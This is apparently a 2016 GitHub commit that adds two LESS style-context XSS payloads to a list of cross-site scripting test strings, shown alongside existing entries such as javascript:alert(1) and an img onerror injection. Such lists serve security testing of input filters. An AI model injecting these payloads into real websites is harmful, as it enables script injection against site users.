added 2 style context XSS attacks for LESS

cc: https://twitter.com/merttasci_/status/786878767604043776
This commit is contained in:
Mert Tasci 2016-10-19 14:12:27 +03:00 committed by GitHub
parent 71407d12e0
commit 6724d78102

View file

@ -163,3 +163,5 @@ javascript:alert(1)
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
x”</title><img src%3dx onerror%3dalert(1)>
[[#%3Cscript%3Ealert(1)%3C/script%3E|
a{b:`function(){alert(1)}()`;}
"><style type=text/less>a{b:`function(){alert(1)}()`;}</style>